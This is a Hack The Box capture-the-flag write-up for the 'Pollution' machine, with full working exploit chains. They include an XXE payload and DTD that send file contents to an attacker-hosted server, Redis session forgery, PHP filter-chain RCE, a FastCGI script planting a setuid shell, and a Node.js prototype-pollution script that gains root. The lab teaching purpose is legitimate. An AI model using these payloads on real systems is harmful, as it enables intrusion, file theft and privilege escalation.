[HTB | Hard] Pollution

Port Scanning

We start with a simple nmap scan:

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
|   3072 db1d5c65729bc64330a52ba0f01ad5fc (RSA)
|   256 4f7956c5bf20f9f14b9238edcefaac78 (ECDSA)
|_  256 df47554f4ad178a89dcdf8a02fc0fca9 (ED25519)
80/tcp   open  http    Apache httpd 2.4.54 ((Debian))
|_http-title: Home
|_http-server-header: Apache/2.4.54 (Debian)
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
6379/tcp open  redis   Redis key-value store
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We can see that we have 3 open ports:

Port 22: simple ssh
Port 80 Apache web server
Port 6379 Redis database

Web Scanning

Website Enumeration

As we can deduct from the server is that we have a domain (collect.htb) that we can add to our "/etc/hosts" and for the login/register input there is nothing we can do for now.

Scanning for vhosts we found out that we have 2 of them:

forum.collect.htb
developers.collect.htb

As the "developers" endpoint is protected by a htpasswd login we check for the forum.

Proxy History and First Escalation

After browsing the forum the only suspicius thing we could observe is a proxy history posted by one of the user:

Inside this file we can see some http request encoded in base64 but one is more useful than all the others:

POST /set/role/admin HTTP/1.1
Host: collect.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=r8qne20hig1k3li6prgk91t33j
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 38

token=ddac62a28254561001277727cb397baf

We can actually try this post request on the main website to get the administrator page (you need to be logged with a normal user and to replace the PHPSESSID cookie)!

XXE

It seems there is nothing useful in the admin page apart for the form which let you subscribe to the API. Intercepting the request with BurpSuite we can notice that is a API that accept xml input:

After some tries we got arbitrary file read through XXE by hosting a dtd file in our machine and adding an external entity in the API request. XXE portswigger exercise that helped me + a php wrapper

For achieve the local file read we need to setup a few but simple things:

Host a python server

sudo python -m http.server 80

Create a local .dtd file (mine is called exploit.dtd) (insert in <FILETOREAD> the path of the file you want to read, you cannot read all files) (insert in <IP> your machine ip)

<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=<FILETOREAD>">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://<IP>/?x=%file;'>">
%eval;
%exfil;

Make a request including the entity in the xml api request

manage_api=<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://<IP>/exploit.dtd"> %xxe;]><root<method>POST</method><uri>/auth/register</uri><user><username>test</username><password>test</password></user></root>

decode from base64 the files recieved in the python server log

Local File Enumeration, Further Escalation and RevShell

As soon we got Local file enumeration we read the index.php:

<?php

require '../bootstrap.php';

use app\classes\Routes;
use app\classes\Uri;


$routes = [
    "/" => "controllers/index.php",
    "/login" => "controllers/login.php",
    "/register" => "controllers/register.php",
    "/home" => "controllers/home.php",
    "/admin" => "controllers/admin.php",
    "/api" => "controllers/api.php",
    "/set/role/admin" => "controllers/set_role_admin.php",
    "/logout" => "controllers/logout.php"
];

$uri = Uri::load();
require Routes::load($uri, $routes);

Nothing useful here, but we can surely check the required ../bootstrap.php:

<?php
ini_set('session.save_handler','redis');
ini_set('session.save_path','tcp://127.0.0.1:6379/?auth=COLLECTR3D1SPASS');

session_start();

require '../vendor/autoload.php';

Nice, we now have credentials fo the redis server. But we are not done with local files because we remembered that there is an htpasswd-protected "developers" endpoint so we need to read /var/www/developers/.htpasswd: developers_group:apr1$MzKA5yXY$DwEz.jxW9USWo8.goD7jY1

We simply crack the password with hashcat (hashcat -a 0 -m 1600 hash.txt rockyou.txt) and get the combo: developers_group:r0cket

We can now login to developers.collect.htb We now got another login page (uff) We once again ask for our previous local file reading to read /var/www/developers/index.php:

<?php
require './bootstrap.php';

if (!isset($_SESSION['auth']) or $_SESSION['auth'] != True) {
    die(header('Location: /login.php'));
}

if (!isset($_GET['page']) or empty($_GET['page'])) {
    die(header('Location: /?page=home'));
}
$view = 1;
?>
...

Ok, we need "auth" set in our session.

After a bit of research we found out that we can actually see and modify our PHPSESSID thanks to the Redis database credentials we found earlier HackTricks Redis Pentesting

Now we can just authenticate by setting auth|s:4:\"True\"; with: set PHPREDIS_SESSION:r7f65lnphhgddoosgngf4gou1i "username|s:4:\"test\";role|s:5:\"admin\";auth|s:4:\"True\";"

The website actually don't seem to have nothing interesting, only the parameter in the url catch the eye.

After a lot of tries we finally got RCE thanks to php filer chains: python php_filter_chain_generator.py --chain '<?= print_r(system($_GET["cmd"]));?>' and then make a request like this on burpsuite: GET /?cmd=<command>&page=<php_chain>

RevShell to User

The thing that caught the attention was that the only user of the machine, victor, was running a strange process: "php-fpm" and searching for it we found FastCGI Pentesting which run on port 9000 (which is open on localhost). We can easily escalate to the user victor with this bash script:

#!/bin/bash

PAYLOAD="<?php echo '<!--'; system('cp /bin/bash /tmp/victorbash && chmod +s /tmp/victorbash'); echo '-->';"
FILENAMES="/tmp/test.php" # Exisiting file path

HOST=$1
B64=$(echo "$PAYLOAD"|base64)

for FN in $FILENAMES; do
    OUTPUT=$(mktemp)
    env -i \
      PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \
      SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \
      cgi-fcgi -bind -connect $HOST:9000 &> $OUTPUT

    cat $OUTPUT
done

We run it with: bash excalate.sh localhost And then: /tmp/victorbash -p

User 2 Root

In the user directory we found the folder "pollution_api" which was runned by root (root 1381 0.0 1.8 1679760 74312 ? Sl Mar28 0:01 /usr/bin/node /root/pollution_api/index.js): reversing the api we found out:

A mysql user and password
A prototype pollution vulnerability on the /messages/send endpoint

The first thing to do is to set up a user for our user in the database by updating the role from user to admin in the users table. We then now retrieve the x-access-token form the api sending a request like this from the previous admin panel in "collect.htb":

manage_api=<?xml version="1.0" encoding="UTF-8"?><root<method>POST</method><uri>/auth/login</uri><user><username>test</username><password>test</password></user></root>

Then we make a request with the crafted Prototype Pollution Injection due to the non sanitized "merge" function:

#!/usr/bin/env python3

import requests
import json
import sys

x_access_token = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoidGVzdCIsImlzX2F1dGgiOnRydWUsInJvbGUiOiJhZG1pbiIsImlhdCI6MTY4MDExMzYwNiwiZXhwIjoxNjgwMTE3MjA2fQ.LKAvti1fNAltzwqf6qwzkdjLxXfGDpT1n6bn6HGZuBQ"
payload = {"text":{"constructor": {"prototype": {"shell": "/proc/self/exe","argv0":"console.log(require('child_process').execSync('cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash').toString())//","NODE_OPTIONS":"--require /proc/self/cmdline"}}}}

r = requests.post("http://localhost:3000/admin/messages/send", headers={"x-access-token": x_access_token, "Content-type": "application/json"}, data=json.dumps(payload))
print(r.text)

We run the python script with python3 exploit.py

We've done it! Now we just need to /tmp/rootbash -p to get root privilege! uid=0(root) gid=0(root) groups=0(root)

That's was a really cool box and thanks for the reading.

Hope to see you soon!

Pedio Zaki

Previous[HTB | Easy] Busqueda Next[HTB | Insane] Derailed

Last updated 1 year ago

Was this helpful?